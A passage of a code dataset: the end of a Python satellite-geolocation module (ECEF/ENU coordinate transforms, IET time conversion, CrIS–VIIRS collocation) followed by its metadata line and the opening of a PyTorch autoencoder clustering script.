\n\n x0 = np.asarray(east, dtype=np.float64)\n y0 = np.asarray(north, dtype=np.float64)\n z0 = np.asarray(up, dtype=np.float64)\n\n lm = deg2rad(np.asarray(lon, dtype=np.float64))\n ph = deg2rad(np.asarray(dlat, dtype=np.float64))\n\n x=-1.0*x0*sin(lm)-y0*cos(lm)*sin(ph)+z0*cos(lm)*cos(ph)\n y= x0*cos(lm) -y0*sin(lm)*sin(ph)+z0*sin(lm)*cos(ph)\n z= x0*0 +y0*cos(ph) +z0*sin(ph) \n\n return x, y, z\n\ndef ECEF2ENU (x, y, z, lon, dlat):\n \"\"\"\n From ECEF(x, y, z) to ENU (East, North, up) coordinates at a given location(lon, dlat)\n Reference is here: \n http://www.navipedia.net/index.php/Transformations_between_ECEF_and_ENU_coordinates\n Note that laitutde should be geocentric latitude instead of geodetic latitude\n \"\"\"\n \n x = np.asarray(x, dtype=np.float64)\n y = np.asarray(y, dtype=np.float64)\n z = np.asarray(z, dtype=np.float64)\n \n lm = deg2rad(np.asarray(lon, dtype=np.float64))\n ph = deg2rad(np.asarray(dlat, dtype=np.float64))\n \n east = -x*sin(lm) + y*cos(lm) \n north = -x*cos(lm)*sin(ph) - y*sin(lm)*sin(ph) + z*cos(ph) \n up = x*cos(lm)*cos(ph) + y*sin(lm)*cos(ph) + z*sin(ph)\n\n return east, north, up \n\ndef GEO2ECEF( lon, lat, satAzimuth, satRange, satZenith, height = None): \n \"\"\"\n from geolocation fields including lon, lat, satAzimuth, satRange, satZenith to compute \n LOS and satPos vectors in ECEF \n \"\"\" \n \n \n lon = np.asarray(lon, dtype=np.float64)\n lat = np.asarray(lat, dtype=np.float64)\n if height is None: height = np.zeros_like(lat)\n satAzimuth = np.asarray(satAzimuth, dtype=np.float64) \n satRange = np.asarray(satRange, dtype=np.float64) \n satZenith = np.asarray(satZenith , dtype=np.float64) \n \n savShape = lon.shape\n \n # compute CrIS Pos Vector \n pos_x, pos_y, pos_z = LLA2ECEF(lon, lat, height)\n pos_x = np.expand_dims(pos_x, axis=-1)\n pos_y = np.expand_dims(pos_y, axis=-1)\n pos_z = np.expand_dims(pos_z, axis=-1)\n\n # compute CrIS LOS Vector\n east, north, up = RAE2ENU(satAzimuth, satZenith, satRange)\n los_x, los_y, los_z = ENU2ECEF(east, north, up, lon, lat)\n los_x = np.expand_dims(los_x, axis=-1)\n los_y = np.expand_dims(los_y, axis=-1)\n los_z = np.expand_dims(los_z, axis=-1)\n \n pos = np.concatenate((pos_x, pos_y, pos_z), axis=-1)\n los = np.concatenate((los_x, los_y, los_z), axis=-1)\n \n satPos = pos + los \n \n return pos, los, satPos \n \n#####################################################################################\ndef ECEF2LLA(xIn, yIn, zIn):\n\n \"\"\"\n Transform ECEF x,y,z (meters) lon,lat,alt (WGS84 degrees, meters) to \n \"\"\"\n\n x = np.asarray(xIn, dtype=np.float64)\n y = np.asarray(yIn, dtype=np.float64)\n z = np.asarray(zIn, dtype=np.float64)\n\n if x.size != y.size or x.size != z.size or x.ndim > 1: \n print(x, y, z)\n print(x.shape, y.shape, z.shape)\n \n print (\"check input x, y, z's shape\")\n return\n\n ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n\n geoLon, geoLat, geoAlt = pyproj.transform(ecef, lla, x, y, z, radians=False)\n\n return geoLon, geoLat, geoAlt\n \n \n\n##################################################################################### \ndef IET2ATIME(iet):\n \"\"\"\n convert IET time into TIME \n \"\"\"\n aTime = Time('1958-01-01', scale='tai') + TimeDelta(iet*1e-6, format='sec')\n return aTime\n\n\ndef TIME2IET(datetime): \n \"\"\"\n convert a DATETIME varible into IET \n \"\"\"\n t1= Time(datetime, scale='utc')\n t0 = Time('1958-01-01', scale='tai')\n dt = t1.tai-t0.tai\n dt.format = 'sec'\n iet = np.int64(dt.value*1e6)\n return iet\n\ndef ATIME2IET(aTime): \n \"\"\"\n convert a TIME varible into IET \n \"\"\"\n t0 = Time('1958-01-01', scale='tai')\n dt = aTime.tai-t0.tai\n dt.format = 'sec'\n iet = np.int64(dt.value*1e6)\n return iet \n \n\n##################################################################################### \n \ndef ECR2ECI_NOVAS (inTime, inPos, inVel, tflag='IET'):\n\n \"\"\"\n Transform Position and Velocity vector from ECR to ECI frame using NOVAS function. \n \"\"\"\n inPos = np.asarray(inPos, dtype=np.float64)\n inVel = np.asarray(inVel, dtype=np.float64)\n \n \n oneFlag = 0 \n if inTime.size == 1: \n inTime = np.repeat(inTime, 2)\n oneFlag = 1\n if inPos.size ==3 : \n inPos = np.broadcast_to(inPos, (2, 3))\n if inVel.size == 3: \n inVel = np.broadcast_to(inVel, (2, 3))\n \n \n if tflag == 'IET': \n inTime = np.asarray(inTime)\n aTime = Time('1958-01-01', scale='tai') + TimeDelta(inTime*1e-6, format='sec')\n if tflag == 'aTime': aTime = inTime\n \n # set Polar Motion data \n pmx, pmy = dat.pm_xy(aTime)\n pmx=pmx.value\n pmy=pmy.value\n \n # set TT-UT1 data\n delta_t = map(timedelta.total_seconds, aTime.tt.datetime-aTime.ut1.datetime)\n \n # set jd_ut1 data \n jd_ut1_high=aTime.ut1.jd\n jd_ut1_low = np.zeros_like(jd_ut1_high)\n \n inPos_List = inPos.tolist()\n \n mapfunc = partial(ter2cel, method=1) # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, inPos_List)\n outPos = np.asarray(s)\n \n if inVel.size ==1 : \n outVel = 0\n else: \n \n # counting Earth Rotation velocity\n tempVec = np.cross(np.array([0,0, ANGVEL]), inPos, axisa=0, axisb=1)\n vectorIn = inVel + tempVec\n \n vectorIn_List = vectorIn.tolist() \n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, vectorIn_List)\n outVel = np.asarray(s)\n \n if oneFlag == 1: \n outPos = outPos[0, :]\n if isinstance(outVel, np.ndarray): outVel = outVel[0, :]\n \n return outPos, outVel\n\ndef ECI2ECR_NOVAS (inTime, inPos, inVel, tflag='IET'):\n\n \"\"\"\n Transform Position and Velocity vector from ECI to ECR frame using NOVAS function. \n \"\"\"\n \n inPos = np.asarray(inPos, dtype=np.float64)\n inVel = np.asarray(inVel, dtype=np.float64)\n \n \n oneFlag = 0 \n if inTime.size == 1: \n inTime = np.repeat(inTime, 2)\n oneFlag = 1\n if inPos.size ==3 : \n inPos = np.broadcast_to(inPos, (2, 3))\n if inVel.size == 3: \n inVel = np.broadcast_to(inVel, (2, 3))\n \n\n if tflag == 'IET': \n inTime = np.asarray(inTime)\n aTime = Time('1958-01-01', scale='tai') + TimeDelta(inTime*1e-6, format='sec')\n if tflag == 'aTime': aTime = inTime\n \n # set Polar Motion data \n pmx, pmy = dat.pm_xy(aTime)\n pmx=pmx.value\n pmy=pmy.value\n \n # set TT-UT1 data\n delta_t = map(timedelta.total_seconds, aTime.tt.datetime-aTime.ut1.datetime)\n \n # set jd_ut1 data \n jd_ut1_high=aTime.ut1.jd\n jd_ut1_low = np.zeros_like(jd_ut1_high) \n inPos_List = inPos.tolist()\n\n mapfunc = partial(cel2ter, method=1) # <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, inPos_List)\n \n outPos = np.asarray(s)\n \n if inVel.size == 1 : \n vectorOut = 0\n else: \n vectorIn_List = inVel.tolist()\n s = map(mapfunc, jd_ut1_high, jd_ut1_low, delta_t, pmx, pmy, vectorIn_List)\n vectorOut = np.asarray(s)\n \n # counting Earth Rotation velocity\n tempVec = np.cross(np.array([0,0, ANGVEL]), inPos, axisa=0, axisb=1)\n vectorOut = vectorOut - tempVec\n \n if oneFlag == 1: \n outPos = outPos[0, :]\n if isinstance(vectorOut, np.ndarray): vectorOut = vectorOut[0, :]\n \n return outPos, vectorOut\n\n \n##################################################################################### \ndef buildECIOrbFrame (inTime, posECR, velECR, tflag='IET'): \n\n \"\"\"\n NOTE: The \"orbit frame\" is a coordinate system describing the perfect\n attitude. If the spacecraft frame(coordinate system) is exactly aligned\n with the orbit frame, then the roll, pitch, and yaw would all be zero and\n spacecraft attitude would be perfect. The orbit frame Z axis points down\n to geodetic nadir, the Y axis is at a right angle to the Z axis, and the\n spacecraft velocity vector (which means the Y axis is nearly at a right\n angle to the orbit plane). The X axis completes a right handed cartesian\n coordinate system, and is less than one degree away from the direction of\n the spacecraft velocity vector. The X and Y axis of the orbit frame\n form a plane which is geodetically horizontal.\n \"\"\"\n\n posECR = np.asarray(posECR, dtype=np.float64)\n velECR = np.asarray(velECR, dtype=np.float64)\n inTime = np.asarray(inTime)\n \n if posECR.ndim ==1: posECR = np.expand_dims(posECR, axis=0)\n if velECR.ndim ==1: velECR = np.expand_dims(velECR, axis=0)\n if inTime.size == 1 and inTime.ndim == 0: inTime = np.expand_dims(inTime, axis=0)\n \n \n if tflag == 'IET': aTime = Time('1958-01-01', scale='tai') + TimeDelta(inTime*1e-6, format='sec')\n \n # compute satellite lon, geodetic lat, and altitude \n sc_Lon, sc_dLat, sc_Alt = ECEF2LLA(posECR[:, 0], posECR[:, 1], posECR[:, 2])\n \n # compute gedetic nadir position vector in ECR \n nadir_p = np.zeros_like(posECR)\n nadir_p[:, 0], nadir_p[:, 1], nadir_p[:, 2] =LLA2ECEF(sc_Lon, sc_dLat, np.zeros_like(sc_Lon))\n \n # the vector from satellite to geodetic nadir \n nadirVecECR = nadir_p - posECR \n nadirVecECR = normalize_vector(nadirVecECR)\n \n # convert all the vector from ECR to ECI\n \n posECI, velECI = ECR2ECI_NOVAS(inTime, posECR, velECR)\n \n nadirVecECI, tmpVel = ECR2ECI_NOVAS(inTime, nadirVecECR, 0)\n \n orbFrameZ = nadirVecECI \n orbFrameY = np.cross(orbFrameZ, velECI)\n orbFrameY = normalize_vector(orbFrameY)\n orbFrameX = np.cross(orbFrameY, orbFrameZ)\n \n orbFrameY = normalize_vector(orbFrameY)\n orbFrameX = normalize_vector(orbFrameX)\n \n Mat_ECItoOrb = np.zeros((int(posECR.size/3), 3, 3), dtype=np.float64)\n \n Mat_ECItoOrb[:,:, 0] = orbFrameX\n Mat_ECItoOrb[:,:, 1] = orbFrameY\n Mat_ECItoOrb[:,:, 2] = orbFrameZ\n \n # return Rotation Matrix from Orbital Frame to ECI(J2000). \n return np.squeeze(Mat_ECItoOrb) \n##################################################################################### \n \ndef orb2sc(rollIn, pitchIn, yawIn): \n \"\"\"\n Now form the direction cosine matrix from the roll, pitch, and yaw.\n This is a 3-1-2 matrix (i.e.: yaw, then roll, then pitch). This\n forms a matrix which will rotate a vector in Orbit Frame Coordinates\n to spacecraft coordinates.\n \n input roll,pitch, yaw in radium\n \"\"\" \n roll = np.asarray(rollIn, dtype=np.float64)\n pitch = np.asarray(pitchIn, dtype=np.float64)\n yaw = np.asarray(yawIn, dtype=np.float64)\n \n if np.asarray(roll).shape != np.asarray(pitch).shape or \\\n np.asarray(roll).shape != np.asarray(yaw).shape: \n return None\n\n matDC = np.zeros((np.asarray(roll).size, 3, 3), dtype=np.float64)\n\n sin_roll = sin(roll)\n cos_roll = cos(roll)\n\n sin_pitch = sin(pitch)\n cos_pitch = cos(pitch)\n\n sin_yaw = sin(yaw)\n cos_yaw = cos(yaw)\n\n # Noted that it is from orbit to spacecraft\n \n # First row of the matrix.\n matDC[:, 0, 0] = (cos_yaw * cos_pitch) - (sin_yaw * sin_roll * sin_pitch)\n matDC[:, 0, 1] = (sin_yaw * cos_pitch) + (cos_yaw * sin_roll * sin_pitch)\n matDC[:, 0, 2] = -cos_roll * sin_pitch\n\n # Second row of matrix\n matDC[:, 1, 0] = -sin_yaw * cos_roll\n matDC[:, 1, 1] = cos_yaw * cos_roll\n matDC[:, 1, 2] = sin_roll\n\n #Third row of matrix.\n matDC[:, 2, 0] = (cos_yaw * sin_pitch) + (sin_yaw * sin_roll * cos_pitch)\n matDC[:, 2, 1] = (sin_yaw * sin_pitch) - (cos_yaw * sin_roll * cos_pitch)\n matDC[:, 2, 2] = cos_roll * cos_pitch\n \n Mat_SPCtoOrb = np.squeeze(matDC)\n \n # return Rotation Matrix from Orbital Frame to Spacecraft. \n return Mat_SPCtoOrb \n \n##################################################################################### \n \ndef calcGDRollPitchYaw(matDC): \n\n \n ## MatDC is Rotation Matrix from Orbital Frame to Spacecraft. \n if matDC.ndim ==2 and matDC.size==9: matDC = np.expand_dims(matDC, axis=0) \n\n roll = asin(matDC[:, 1, 2]);\n\n cos_roll = cos(roll);\n\n sin_pitch = (-matDC[:, 0, 2]) / cos_roll;\n cos_pitch = matDC[:, 2, 2] / cos_roll;\n\n pitch = atan2(sin_pitch, cos_pitch);\n\n sin_yaw = (-matDC[:, 1, 0]) / cos_roll;\n cos_yaw = matDC[:, 1, 1] / cos_roll;\n\n yaw = atan2(sin_yaw, cos_yaw);\n \n if matDC.size==9: return roll[0], pitch[0], yaw[0]\n else: return roll, pitch, yaw \n \n#####################################################################################\ndef conVec2LatLonAlt (Vec): \n\n inVec = np.asarray(Vec, dtype=np.float64)\n\n ### WGS84 Parameters\n a = WGS84_A\n f = WGS84_F \n b = WGS84_A\n e2= WGS84_E2\n ep = sqrt((a**2.0-b**2.0)/b**2.0)\n\n MAX_LAT_DIFF = 1.0e-10\n\n ## Calculate square of radius from the Earth axis to the position.\n ## Get radius to position by adding the Z squared.\n\n ## Distance from axis to position.\n xyRadius = (inVec[0]*inVec[0]) + (inVec[1]*inVec[1])\n\n ## Radius to position.\n posRadius = sqrt(xyRadius + (inVec[2]*inVec[2])) \n\n xyRadius = sqrt(xyRadius)\n\n ## Calculate the longitude.\n lon = arctan2(inVec[1], inVec[0]);\n\n ## Calculate the geocentric latitude.\n cLat = arcsin( inVec[2] / posRadius )\n \n dLat = cLat\n while True: \n \n tmpGDLat = dLat\n sinGDLat = sin(tmpGDLat)\n\n convNum = 1.0 / sqrt(1.0 - e2 * sinGDLat * sinGDLat)\n\n adjZ = inVec[2] + (a * convNum * e2 * sinGDLat)\n dLat = arctan2(adjZ, xyRadius)\n \n if np.abs(dLat - tmpGDLat) < MAX_LAT_DIFF: break\n\n RN = a/sqrt(1-e2*(sin(dLat)**2)) \n alt = xyRadius/cos(dLat) - RN \n \n return rad2deg(lon), rad2deg(dLat), alt \n#####################################################################################\n\ndef earth_radius_D (dLat): \n \"\"\"\n DESCRIPTION: Computes the radius of the earth, in meters, from the\n geodetic latitude.\n \"\"\"\n \n rlat = deg2rad(dLat) \n \n #***************************************************************************\n #convert input geodetic latitude to geocentric\n #save the sine of the geocentric latitude\n #**********************/\n\n clat = arctan( detic2centric * tan(rlat) );\n sine_lat = sin(clat)\n\n #/***************************************************************************\n #calculate the radius of earth, WGS 84 ellipsoid\n #**********************/\n radius = eq_radm / sqrt(1.e0 + (delta * sine_lat * sine_lat));\n\n return radius\n \n##################################################################################### \ndef match_cris_viirs(crisLos, crisPos, viirsPos, viirsMask):\n \"\"\"\n Match crisLos with viirsPos using the method by Wang et al. (2016)\n Wang, L., D. A. Tremblay, B. Zhang, and Y. Han, 2016: Fast and Accurate \n Collocation of the Visible Infrared Imaging Radiometer Suite \n Measurements and Cross-track Infrared Sounder Measurements. \n Remote Sensing, 8, 76; doi:10.3390/rs8010076. \n \"\"\"\n \n # Derive Satellite Postion \n crisSat = crisPos - crisLos \n \n # using KD-tree to find best matched points \n # build kdtree to find match index \n pytree_los = KDTree(viirsPos.reshape(-1, 3))\n dist_los, idx_los = pytree_los.query(crisPos.reshape(-1, 3) , sqr_dists=False)\n \n my, mx = np.unravel_index(idx_los, viirsPos.shape[0:2])\n \n idy, idx = find_match_index(crisLos.reshape(-1, 3),crisSat.reshape(-1, 3), viirsPos, viirsMask, mx, my)\n \n if np.array(idy).size ==0: \n idy = None \n idx = None\n else: \n idy = np.array(idy).reshape(crisLos.shape[0:crisLos.ndim-1])\n idx = np.array(idx).reshape(crisLos.shape[0:crisLos.ndim-1])\n\n return idy, idx\n\ndef match_cris_viirs_pert(crisLos, crisPos, viirsPos, viirsMask, crisLosPert):\n \"\"\"\n Match crisLos with viirsPos using the method by Wang et al. (2016)\n Wang, L., D. A. Tremblay, B. Zhang, and Y. Han, 2016: Fast and Accurate \n Collocation of the Visible Infrared Imaging Radiometer Suite \n Measurements and Cross-track Infrared Sounder Measurements. \n Remote Sensing, 8, 76; doi:10.3390/rs8010076. \n \"\"\"\n \n bsize, asize, nScan, nFor, nFov, nVec = crisLosPert.shape\n \n # Derive Satellite Postion \n crisSat = crisPos - crisLos \n crisSatPert = np.broadcast_to(crisSat, (bsize, asize, nScan, nFor, nFov, nVec))\n crisPosPert = compute_geolocation(crisSatPert.reshape(-1, 3), crisLosPert.reshape(-1,3), flag=1)\n \n \n # using KD-tree to find best matched points \n # build kdtree to find match index\n start_time = time.time() \n pytree_los = KDTree(viirsPos.reshape(-1, 3))\n dist_los, idx_los = pytree_los.query(crisPosPert.reshape(-1, 3) , sqr_dists=False)\n \n my, mx = np.unravel_index(idx_los, viirsPos.shape[0:2])\n my = my.reshape(bsize, asize, -1)\n mx = mx.reshape(bsize, asize, -1)\n \n print(\"K-D Tree <---> %s seconds ---\" % (time.time() - start_time))\n \n \n s = [find_match_index(crisLosPert[i, j].reshape(-1, 3),crisSatPert[i, j].reshape(-1, 3), viirsPos, viirsMask, mx[i, j], my[i, j]) \\\n for i, j in np.ndindex(crisLosPert.shape[0:2])]\n \n s = np.array(s) \n if s.size == 0: \n iidy = None \n iidx = None \n else: \n iidy = s[:, 0, :].reshape(crisLosPert.shape[0:crisLosPert.ndim-1])\n iidx = s[:, 1, :].reshape(crisLosPert.shape[0:crisLosPert.ndim-1]) \n \n return iidy, iidx \n \ndef angle (v_pos, v_Qa, c_sat, c_los, x0, y0, cos_half_fov): \n v_los = v_pos - c_sat\n cos_angle = dot_product(v_los, c_los)/mag_vector(v_los) - cos_half_fov\n iy, ix = np.where ( (v_Qa == 0) & (cos_angle > 0) )\n return np.asarray(iy)+y0, np.asarray(ix)+x0 \n \n\ndef find_match_index (cris_los, cris_sat, viirs_pos_in, viirs_sdrQa_in, \\\n mx, my, fovDia=0.963): \n \n nLine, nPixel = viirs_pos_in.shape[0:2]\n \n # setup parameters \n cos_half_fov=cos(deg2rad(fovDia/2.0)) \n if nPixel == 3200: nc = np.round(deg2rad(fovDia/2)*833.0/0.75*4).astype(np.int)\n if nPixel == 6400: nc = np.round(deg2rad(fovDia/2)*833.0/0.375*4).astype(np.int)\n \n # return list \n xb = mx-nc\n xb = xb.clip(0, nPixel-1)\n xe = mx+nc\n xe = xe.clip(0, nPixel-1)\n \n yb = my-nc\n yb = yb.clip(0, nLine-1)\n ye = my+nc\n ye = ye.clip(0, nLine-1)\n \n cris_los = normalize_vector(cris_los)\n \n viirs_pos_list = [viirs_pos_in[y0:y1, x0:x1] for y0, y1, x0, x1 in izip(yb, ye, xb, xe)]\n viirs_Qa_list = [viirs_sdrQa_in[y0:y1, x0:x1] for y0, y1, x0, x1 in izip(yb, ye, xb, xe)] \n \n \n # start_time = time.time()\n # viirs_los_list = [viirs_pos_in[yb[i]:ye[i], xb[i]:xe[i]] - cris_sat[i] for i in range(0, len(xb))]\n # cos_angle_list = [dot_product(v_los, cris_los[i])/mag_vector(v_los) - cos_half_fov for i, v_los in enumerate(viirs_los_list)]\n # iiy, iix = zip(*[np.where((v_Qa == 0) & (cos_angle > 0)) for cos_angle, v_Qa in zip(cos_angle_list, viirs_Qa_list)])\n # iix = [ix + x0 for ix, x0 in zip(iix, xb)]\n # iiy = [iy + y0 for iy, y0 in zip(iiy, yb)]\n # print(\"Method --- %s seconds ---\" % (time.time() - start_time))\n \n #start_time = time.time() \n anglefunc = partial(angle, cos_half_fov=cos_half_fov)\n \n res = map(anglefunc, viirs_pos_list, viirs_Qa_list, cris_sat.tolist(), cris_los.tolist(), xb.tolist(), yb.tolist())\n index_y, index_x = zip(*res)\n #print(\"angle <---> %s seconds ---\" % (time.time() - start_time))\n \n return index_y, index_x\n\n ##################################################################################### \n\n \ndef compute_geolocation (satellitePosition, lineOfSight, flag=None):\n \"\"\"\n geoLat, geoLon = compute_geolocation(satellitePosition, lineOfSight)\n\n Given the satellite position and the line-of-sight (or lookup vector), this function returns\n the geodetic (or geographic) latitude and longitude of the geolocation point on the Earth\n ellipsoid characterized by the Earth radius and flattening factor. \n \n Input:\n SatellitePosition: Three elements vector of the satellite position in the Earth Centered\n Reference (ECR) frame (float or double)\n lineOfSight: Three elements unit vector of lookup vector ( viewing vector toward the Earth surface).\n Output:\n geoLat : Geodetic (geographic) latitude of the Earth geolocation point. \n geoLon : Longitude of the Earth geolocation point. \n \"\"\"\n\n satellitePosition = np.asarray(satellitePosition, dtype=np.float64) \n lineOfSight = np.asarray(lineOfSight, dtype=np.float64) \n \n earthRadius = WGS84_A\n flatFact = WGS84_F\n \n if satellitePosition.ndim == 1: \n satellitePosition = np.expand_dims(satellitePosition, axis=0)\n \n if lineOfSight.ndim == 1: \n lineOfSight = np.expand_dims(lineOfSight, axis=0)\n \n if satellitePosition.shape != lineOfSight.shape or \\\n satellitePosition.ndim !=2 or \\\n lineOfSight.ndim !=2 : \n print ('check input array ... return')\n return\n \n \n # ;; The basic equations are:\n # ;;\n # ;; P + lambda LOS = G ( P = satellite position, LOS = line of sight, G = geolocation point).\n # ;; and lambda is the slant range.\n # ;;\n # ;; and\n # ;;\n # ;; Gx^2 / a^2 + Gy^2 / a^2 + Gz^2 / c^2 = 1 Earth ellipsoid equation, a = equatorial radius.\n # ;; c is polar radius ( c = ( 1-f) * a) where f is flattening factor.\n \n polarRadius = earthRadius * ( 1.0 - flatFact) ;\n \n # ;; The geolocation vector position is the solution of\n # ;; a quadratic equation where A lambda^2 + B lambda + C = 0, here x is the slant range.\n \n termA = (lineOfSight[:, 0] / earthRadius)**2 + \\\n (lineOfSight[:, 1] / earthRadius)**2 + \\\n (lineOfSight[:, 2] / polarRadius)**2\n\n termB = satellitePosition[:, 0]* lineOfSight[:, 0]/ (earthRadius**2) + \\\n satellitePosition[:, 1]* lineOfSight[:, 1]/ (earthRadius**2) + \\\n satellitePosition[:, 2]* lineOfSight[:, 2]/ (polarRadius**2) \n termB *= 2.0 \n\n termC = (satellitePosition[:, 0]/earthRadius)**2 + \\\n (satellitePosition[:, 1]/earthRadius)**2 + \\\n (satellitePosition[:, 2]/polarRadius)**2 - 1.0;\n\n radical = termB**2.0 - (4.0 * termA * termC)\n radical = radical.ravel()\n \n ## define the output avriables\n geoLat = np.zeros(int(lineOfSight.size/3))\n geoLon = np.zeros(int(lineOfSight.size/3))\n geoAlt = np.zeros(int(lineOfSight.size/3))\n slantRange = np.zeros(int(lineOfSight.size/3))\n slantRange1 = np.zeros(int(lineOfSight.size/3))\n slantRange2 = np.zeros(int(lineOfSight.size/3))\n geolocationPoint = np.zeros_like(lineOfSight)\n \n # using proj to convert ECEF to LLA \n ecef = pyproj.Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n lla = pyproj.Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n \n # ;; The line of sight does not intercept the Earth ellipsoid.\n index, = np.where(radical <0) \n if index.size > 0: \n geoLat[index] = -9999.0\n geoLon[index] = -9999.0\n \n # ;;The line of sight does not intercept the Earth ellipsoid tangentially.\n index, = np.where(radical == 0) \n if index.size > 0 : \n slantRange[index] = -termB[index] / (2.0 * termA[index]) ;\n geolocationPoint[index, :] = satellitePosition[index, :] + np.expand_dims(slantRange[index], axis=1) * lineOfSight[index,:]\n \n geoLon[index], geoLat[index], geoAlt[index] = pyproj.transform(ecef, lla, geolocationPoint[index, 0], \\\n geolocationPoint[index, 1], geolocationPoint[index, 2], radians=False)\n \n # ;; The line of sight intercepts the Earth ellipsoid at 2 point, the solution\n # ;; is the shorter slant range.\n index, = np.where(radical > 0) \n if index.size > 0 : \n \n slantRange1[index] = (-1.0*termB[index] - np.sqrt(radical[index])) / (2.0 * termA[index]);\n slantRange2[index] = (-1.0*termB[index] + np.sqrt(radical[index])) / (2.0 * termA[index]);\n \n #;;;; find the minimum value\n slantRange[index] = np.minimum(slantRange2[index], slantRange1[index])\n \n geolocationPoint[index, :] = satellitePosition[index, :] + np.expand_dims(slantRange[index], axis=1) * lineOfSight[index, :] \n \n geoLon[index], geoLat[index], geoAlt[index] = pyproj.transform(ecef, lla, geolocationPoint[index, 0], \\\n geolocationPoint[index, 1], geolocationPoint[index, 2], radians=False)\n\n index, = np.where(slantRange <= 0.0)\n if index.size > 0 : \n geoLat[index] = -9999.0\n geoLon[index] = -9999.0\n slantRange[index] =0.0\n \n if flag is None: \n return geoLon, geoLat, slantRange\n else: \n return geolocationPoint\n \n\n\ndef fov_shape (losVec, satVec, fovDia=0.963, degree=True): \n\n losVec = np.asarray(losVec, dtype=np.float64)\n satVec = np.asarray(satVec, dtype=np.float64)\n fovDia = np.asarray(fovDia, dtype=np.float64) \n\n if degree==True: \n fovDia = np.deg2rad(fovDia)\n \n if losVec.size % 3 !=0 or losVec.size != satVec.size: \n print(\"please check input ... vector size must be 3 times\")\n return \n \n if losVec.ndim == 1:\n losVec = np.expand_dims(losVec, axis=0)\n \n if satVec.ndim == 1:\n satVec = np.expand_dims(satVec, axis=0) \n \n \n nLos, nVec = losVec.shape\n \n curFovVector = np.zeros((37, nLos, nVec), dtype=np.float64)\n curSatVector = np.broadcast_to(satVec, (37, nLos, nVec))\n \n \n # step 1: cross product of LOS \n orthoVectorLOS = np.cross(losVec, np.array([[0,0,1]]))\n \n # Step 2: Rotatate the orthoVector to LOS by the FOV radius ( in radians).\n fovVector = rotate_vec(orthoVectorLOS, 0.5*fovDia, losVec, degree=False) \n \n \n for angle in np.arange(0,37):\n curFovVector[angle, :, :] = rotate_vec(losVec, angle*10, fovVector, degree=True)\n\n \n curFovLon, curFovLat, curRange = compute_geolocation(curSatVector.reshape(37*nLos,3), \\\n curFovVector.reshape(37*nLos,3))\n \n # using proj to convert ECEF to LLA \n curFovLon = curFovLon.reshape(37, nLos)\n curFovLat = curFovLat.reshape(37, nLos)\n \n \n return curFovLon, curFovLat\n \n###########################################################################\n \ndef interpolate_sat_vector(sat_p, sat_v, sat_att, sat_time, out_time): \n \n ts = sat_time.size\n os = out_time.size\n vs = 3\n \n p_out = np.zeros((os, vs), dtype=np.float64)\n v_out = np.zeros((os, vs), dtype=np.float64)\n att_out = np.zeros((os, vs), dtype=np.float64)\n \n idx = np.where(sat_time > TIME2IET(datetime(2012, 1, 1)))\n \n for i in range(0, vs): \n \n p_out[:, i] = np.interp(out_time, sat_time[idx], sat_p[idx, i].ravel())\n v_out[:, i] = np.interp(out_time, sat_time[idx], sat_v[idx, i].ravel())\n att_out[:, i] = np.interp(out_time, sat_time[idx], sat_att[idx, i].ravel())\n \n return p_out, v_out, att_out\n \n \n \n \n \n \n\n","sub_path":"geolocation.py","file_name":"geolocation.py","file_ext":"py","file_size_in_byte":47345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"520326968","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport torch.optim as optim\n#import matplotlib.pyplot as plt\nfrom torch.autograd import Variable\nfrom torchvision.utils import save_image\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn.metrics.cluster import normalized_mutual_info_score\nfrom scipy.optimize import linear_sum_assignment\nimport argparse\n\npar = argparse.ArgumentParser()\npar.add_argument(\"-d\", \"--data_path\", required=True,\n type=str, help=\"Please enter data path\")\npar.add_argument(\"-f\", \"--num_features\", default=64, choices=[64, 256],\n type=int, help=\"Set the feature size. (64/256)\")\npar.add_argument(\"-t\", \"--types\", default=\"semantic\", choices=[\"real\", \"semantic\"],\n type=str, help=\"Choose a data type. (real/semantic)\")\npar.add_argument(\"-e\", \"--number_of_epochs\", default=100,\n type=int, help=\"number of epochs\")\npar.add_argument(\"-c\", \"--number_of_classes\", default=18,\n type=int, help=\"number of classes\")\nargs = par.parse_args()\n\n## Set the parameters and data path\ndata_path = args.data_path + \"/\"\nnum_features = args.num_features\ntypes = args.types\nnum_epochs = args.number_of_epochs\nnum_classes = args.number_of_classes\nlearning_rate = 0.001\nbatch_size = 128\n\n## Set each path\nlog_path = \"log/pth/best_loss_\" + types + \"_conv_autoencoder_d\" + num_features + \"_save_model.pth\"\ndata_path = data_path + (\"activity\" if types == \"real\" else types)\ndata_all_path = data_path + \"/image/all\"\ndata_train_path = data_path + \"/image/train\"\ndata_test_path = data_path + \"/image/test\"\n\nif not os.path.exists(\"./log/\"):\n os.mkdir(\"./log/\")\nif not os.path.exists(\"./log/pth/\"):\n os.mkdir(\"./log/pth/\")\nsave_log_path = \"./log/check_point/\"\nsave_img_path = \"./log/img/\"\nif not os.path.exists(save_log_path):\n os.mkdir(save_log_path)\nif not os.path.exists(save_img_path):\n os.mkdir(save_img_path)\nsave_log_path = save_log_path + (\"re\" if types == \"real\" else \"se\") + \"_d\" + num_features\nsave_img_path = save_img_path + (\"re\" if types == \"real\" else \"se\") + \"_d\" + num_features\nif not os.path.exists(save_log_path):\n os.mkdir(save_log_path)\nif not os.path.exists(save_img_path):\n os.mkdir(save_img_path)\n\n## Set data loader\ndataset = datasets.ImageFolder(root=data_all_path,\n transform=transforms.Compose([\n transforms.Resize((256,128)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5),\n (0.5, 0.5, 0.5)),\n ]))\ndataloader = torch.utils.data.DataLoader(dataset,\n batch_size=batch_size,\n shuffle=True,\n num_workers=8)\n\ntrain_dataset = 